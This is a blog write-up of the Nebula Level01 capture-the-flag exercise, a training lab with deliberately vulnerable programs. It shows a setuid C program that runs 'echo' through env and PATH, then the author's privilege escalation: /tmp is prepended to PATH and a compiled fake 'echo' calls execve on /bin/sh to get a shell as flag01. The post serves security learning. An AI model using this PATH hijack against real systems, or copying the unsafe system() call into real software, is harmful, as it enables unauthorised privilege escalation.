Mike-Boya

Information Security and Programming Blog

Exploit Exercises - Nebula Level01

The next level, Level01, provides some C code for the user to evaluate. The code contains a vulnerability that allows arbitrary programs to be executed. This post will outline the steps I took to solve the challenge.

I started by reading through the source code in order to locate the vulnerability:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();

setresgid(gid, gid, gid);
setresuid(uid, uid, uid);

system("/usr/bin/env echo and now what?");
}

Almost immediately, I noticed that “echo” is being called without the absolute path. This is a major security vulnerability because the script will rely on the environment variables of the current shell (which can be tampered with).

Let’s modify our path to include /tmp/:

level01@nebula:/home/flag01$ PATH=/tmp:$PATH
level01@nebula:/home/flag01$ export PATH
level01@nebula:/home/flag01$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Now that /tmp is in the current path, we can create our own “echo” command. I have included C code below to spawn a shell. I used this code extensively in my OSCP studies as my payload when exploiting Linux/Unix boxes.

#include <unistd.h>

int main() {
        char *args[2];
        args[0] = "/bin/sh";
        args[1] = NULL;
        execve(args[0], args, NULL);
}

A nice write-up on the code can be found here if you are curious about the creation and execution.

After creating the new “echo” program, I need to compile the code.

level01@nebula:/tmp$ gcc echo.c -o echo
level01@nebula:/tmp$ ls
echo echo.c vmware-root

Now I can call the original script, which will now run our “echo” program:

level01@nebula:/home/flag01$ id
uid=1002(level01) gid=1002(level01) groups=1002(level01)
level01@nebula:/home/flag01$ ./flag01
sh-4.2$ id
uid=998(flag01) gid=1002(level01) groups=998(flag01),1002(level01)
sh-4.2$ getflag
You have successfully executed getflag on a target account

Success!

Mike